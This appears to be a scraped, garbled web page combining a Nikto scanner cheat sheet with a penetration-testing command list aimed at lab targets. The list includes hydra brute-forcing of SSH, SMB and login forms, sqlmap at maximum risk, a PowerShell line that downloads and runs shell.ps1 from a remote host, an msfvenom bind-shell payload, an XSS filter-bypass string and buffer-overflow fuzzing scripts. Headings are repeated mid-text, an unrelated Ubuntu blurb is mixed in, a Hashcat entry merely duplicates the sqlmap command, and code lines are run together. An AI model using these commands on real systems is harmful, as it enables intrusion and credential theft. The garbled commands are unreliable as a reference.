Nikto Cheat Sheet

  

What is the Nikto

  1. To scan for vulnerabilities use Nikto. $ nikto -h WebServer is Open. If Port 80 or 443 is open, we can look for robots.txt to check for hidden flags or clues. To find the Webserver version, Use Curl tool with I flag.
  2. Ubuntu Commands: A Cheat Sheet With Examples By Nicholas Brown – Follow me on Twitter. There are numerous useful Ubuntu Linux commands at your disposal, and they actually make life easier in some cases.

Perl nikto.pl -h 192.168.1.188 -Cgidirs all -o test -Format csv The 'all' options would instruct Nikto2 to test all available CGI directories. If you want to specify a specific CGI directory, the. Tools Cheat Sheet. Bug Bounty & Pen-Test Templates. Powered by GitBook. Nikto # To scan a particular host. Nikto -host host IP/name # To scan a host on multiple ports (default = 80) nikto -host host IP/name -port port number 1, port number 2, port number 3. Installation $ sudo apt-get install nikto nikto cheat sheet Standard command to scan websites nikto –host (web url host name) –(http port number ) Scan options Nikto –h (Hostname/IP address) Scan a host Nikto -h -port (Port Number1),(Port Number2) Scan host targeting specific ports Nikto -h (Hostname) -maxtime (seconds) Define maximum.

Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received. The Nikto code itself is free software, but the data files it uses to drive the program are not.

Features

Nikto can detect over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files and HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

How to install Nikto in Kali Linux

Now, let’s see how to install this tool in our Kali Linux operating system. In this case I have already installed this tool. But I’m show you to how to do this.

In my case it show nikto is already installed.
Now let’s move on.

Nikto Cheat sheet

All of these attacks are against the Metasploitable 2 vulnerable operating system.

Scanning a host

Scanning specific ports on web server

Maximum scan time

Scanning duration

Disable SSL

Force SSL

Disable 404 guessing

Ignore negative responses. 302,301

Update the plugins and databases

Specify host header

Output results

Scanning through a proxy

Host authentication

Database check

Config file

Disable name lookups on IP addresses

Disable response cache

Disable interactive features

Display options

1 Show redirects
2 Show Cookies
3 Show 200/OK responses
4 Show URL requiring authentication
D Show debug output
E HTTP Errors
P Print progress to STDOUT
S Scrub output of IP and Hostname
V Verbose output

Evasion Options

1 Random URI Encoding
2 Directory Self-Reference /./
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Used windows directory separator
A Use a carriage return (0x0d) as a request spacer
B Use binary value (0x0b) as a request spacer

Output File Format

csv Comma-separated-value
htm HTML Format
msf+ Log to Metaspoloit
nbe Nessus NBE
txt Plain text
xml XML Format

Tuning

1 Interesting file
2 Misconfiguration
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval – Inside Web Root
6 Denial of Service
7 Remote File Retrieval – Server Wide
8 Command Execution – Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
x Reverse Tuning Option

Mutate

1 Test all files in root directory
2 Guess for password file names
3 Enumerate user names via apache
4 Enumerate user names via cgiwrap
5 Attempt to brute force sub-domain names
6 Attempt to guess directory names from a file.

In this tutorial, we learned about Nikto, a vulnerability scanner written in the Perl programming language. First, we learned how to install the tool. we ran it against our target and explored some of the various options it ships with.now you know how to use it. Let’s Go!

Masscan (local) :

masscan -p1-65534 -rate=10000 -oG name.masscan 10.10.10.10

Netdiscover :

netdiscover -i eth0

Cheat

Nmap :

nmap -A -p- -T4 -oA nmap/[name].xml 10.10.10.10nmap –script=vuln -T4 -oA nmap/[name].xml 10.10.10.10nmap -sC -sV

xsltproc *.xml -o *.html

Nikto :

nikto -host 10.10.10.10[:8080] -output nikto.[name].txt

DirSearch :

/opt/dirsearch/dirsearch.py -u http://10.10.10.10 -e asp,aspx,bat,c,cfm,cgi,com,dll,exe,htm,html,inc,jhtml,jsa,jsp,log,mdb,nsf,php,phtml,pl,reg,sh,shtml,sql,txt,xml,/,js -x 403,400 –json-report=[/path/]dirsearch.json

Gobuster :

/opt/gobuster/gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.10 -o [name].log -t 25 [-k] [add / option] [-c (cat cookie.txt)]

Dirb :

dirb http://10.10.10.10[:8080] -o dirb.[name].txt

Wfuzz :

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/megabeast.txt –hc 404,200 http://[ip:port]/FUZZ [ -b ‘cookie=value’ ] [ -w /usr/share/wordlist ]

Nikto Cheat Sheet

Dig :

dig axfr @10.10.10.13 cronos.htb

host :

host -t ns cronos.htbhost -t mx cronos.htb

dnsrecon :

dnsrecon -d cronos.htb -t axfr

Hydra :

ssh :

hydra -L login.txt -P pass.txt [ -c file (user:pass format) ] ssh://10.10.10.10[:port]

http-form-post :

hydra [ip] -s [port] http-form-post “/index.php:password=^PASS^:F=Invalid password!” -P [wordlist] -l ‘’ {in this case no username -l ‘’} -t 10 -I

Nikto Cheat Sheet Github

http-form-get :

smb :

hydra -l cristal -x 4:4:a 192.168.2.46 smb

Sqlmap :

sqlmap -r admin.cronos.req –level 5 –risk 3 –threads 10

Hashcat :

sqlmap -r admin.cronos.req –level 5 –risk 3 –threads 10

PowerShell :

use file from the internet :

Nikto Cheat Sheet

IEX(New-Object Net.WebClient).downloadString(‘http://10.10.10.10:8080/shell.ps1’)

Privesc - MetaSploit :

search suggestpost/multi/recon/local_exploit_suggesterset SESSION 1(powerup ?)

Shell :

magic unicorn

https://www.youtube.com/watch?v=e9lVyFH7-4o

Database

Cookie :

padBuster :

perl padBuster.pl http://10.10.10.10/index.php uBIcLBJyjARxQ7ooer8gpdI4sSUCfulk 8 auth=uBIcLBJyjARxQ7ooer8gpdI4sSUCfulk -plaintext user=admin

Monitoring

Network :

netstat :

watch “netstat -angrep 4001”

lsof :

Nikto

watch “lsof -i 4001”

Buffer Overflow

Fuzzing :

#!/usr/bin/env python

Nikto Scan Cheat Sheet

import socketimport time

target_host = “127.0.0.1”target_port = 4030

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)client.connect((target_host, target_port))

for i in range(1,2000) :

client.send(“xn”)response = client.recv(4096)

print response

Bad Characters :

#!/usr/bin/env python

Nikto Cheat Sheet Sans

shellcode = ‘’for i in range(1,256): shellcode += chr(i)

print shellcode

Format String :

Shows 20 dwords from the stack :

for(( i=1; i < 20; i++)); do echo -n “$i “ && ./fs “%$i$x”; done

Use “%s” to retrieve strings instead :

for(( i=1; i < 20; i++)); do echo -n “$i “ && ./fs “%$i$s”; done

MSFVenom :

msfvenom -p linux/x86/shell_bind_tcp -b ‘x00x09x10x13’ LPORT=4450 -f python

Unclassified

JS Prompt :

Filters bypass

<svg%0Ao%00nload=%09((prou006dpt))()//

Vim :

record macro :qq

Nikto Cheat Sheet 2019

SheetNikto

execute macro :

@re execute macro :@@global switch ::%s/item1/item2/g